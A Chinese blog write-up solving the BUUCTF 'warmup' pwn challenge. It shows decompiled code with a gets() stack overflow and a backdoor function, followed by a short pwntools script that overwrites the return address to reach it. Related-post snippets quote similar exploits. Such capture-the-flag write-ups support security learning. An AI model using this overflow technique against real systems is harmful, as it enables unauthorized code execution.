BUUCTF Pwn warmup

最新推荐文章于 2024-02-04 21:20:07 发布
最新推荐文章于 2024-02-04 21:20:07 发布
阅读量196 收藏
点赞数
分类专栏: Pwn 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/121732147
版权

BUUCTF Pwn warmup

1.题目下载地址

点击下载题目

2.checksec检查保护

在这里插入图片描述

  • 啥都没开,果然是warmup

3.IDA静态分析

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-80h] BYREF
  char v5[64]; // [rsp+40h] [rbp-40h] BYREF

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(s, "%p\n", sub_40060D);
  write(1, s, 9uLL);
  write(1, ">", 1uLL);
  return gets(v5);
}
  • 后门函数
int sub_40060D()
{
  return system("cat flag.txt");
}
  • gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了
sprintf(&s, "%p\n", sub_40060D)
  • 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。
  • 所以现在的漏洞利用思路就是将v5缓冲区覆盖,然后覆盖返回地址为后门函数地址

在这里插入图片描述

  • v5的大小是0x40
  • 因为是64位程序,再加8byte覆盖rbp

4.exp

from pwn import*
sh=remote('node3.buuoj.cn',26548)
payload='a'*0x48+p64(0x40060D)
sh.sendline(payload)
sh.interactive()
==Microsoft==
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第七届强网杯-PWN-【warmup
llovewuzhengzi的博客
03-08 1093
如何布置参考使得第一个chunk布置相关rop,第二个chunk布置相关IO_FILE_plus_struct的伪造结构体,然后根据house of apple2来布置,并最后orw。
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
warmup pwn入门题
02-11
pwn入门题
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 380
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf--pwn-warmup
weixin_45427676的博客
09-19 485
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 443
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
[BJDCTF 2nd]r2t3 (整型溢出)
qq_45691294的博客
12-16 167
进入到题目环境,程序接收一个输入,测试之后,发现输入任何值的返回都是Oops,u name is too long! checksec查看一下程序保护,只开启了NX 那就用IDA分析一下程序,将输入读取到buf的内存当中,又作为name_check函数的参数 进入到name_check函数里,存在一个判断,如果参数的长度大于3且小于等于8,则将s的值复制到dest的内存空间里。 分析之后,当通过条件判断之后,变量dest可以造成栈溢出 这里也存在整数溢出,v3的类型为unsigned __int8是一
BJDCTF2nd
Amherstieae的博客
05-25 1040
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
BJDCTF_2nd_Crypto wp
resu09的博客
04-03 216
0x01 签到-y1ng1 提示很明显。 为base64 解密,直接得到flag. BJD{W3lc0me_T0_BJDCTF} 0x02 老文盲了1 因为其提示老文盲,并且打开的txt文档中字母都比较生僻 所以直接将其放在在线网站上寻找拼音 可读出 BJD{}这就是flag 直接交了吧{} 所以明显flag{淛匶襫黼瀬鎶軄鶛驕鳓哵} 0x03 cat_flag 打开文件 发现为一gif 动图 有的猫咪吃鸡腿,有的没有吃。容易想到二进制数0,1。 将图片用二进制
BJDCTF_r2t3
weixin_44864859的博客
04-09 357
BJDCTF_r2t3 考点:考点:短整型溢出 1.首先检查程序的基础信息 32位程序,可以看到这开启了NX保护,说明无法在栈上执行shellcode 2.运行程序,对程序功能有基本了解 程序基本功能:输入name,对name长度进行判断 3.用ida打开进行分析 这里截取了关键部分对代码 首先在main函数中,没有任何可疑的 进入name_check函数:接受了一个最大长度为0x400的b...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
buuctf warmup
doudoudedi
01-28 545
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
buuctf--web篇01WarmUp
Xor0ne
06-14 723
0x01 [HCTF 2018]WarmUp 参考链接:https://blog.csdn.net/zouchengzhi1021/article/details/104173137 打开源码,发现source.php字样,添加在后面,然后就看见了php代码。如下: <?php highlight_file(__FILE__);//highlight_file() 函数对文件进行语法高亮显示。 class emmm { public static functio
warmupbuuctf-pwn
m0_73756460的博客
07-17 185
warmupbuuctf-pwn
Pwn | CTF】BUUCTF warmup_csaw_2016
最新发布
weixin_46301214的博客
02-04 417
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
BJDCTF 2nd writeup
abtgu的博客
03-23 1339
[BJDCTF 2nd]签到-y1ng 题目: QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== 解题思路: 直接base64解码即可。BJD{W3lc0me_T0_BJDCTF} [BJDCTF 2nd]灵能精通-y1ng 题目: 身经百战的Y1ng已经达到崇高的武术境界,以自律克己来取代狂热者的战斗狂怒与传统的战斗形式。Y1ng所受的训练也进一步将他们的灵能强化到足以瓦解周遭...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1266
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值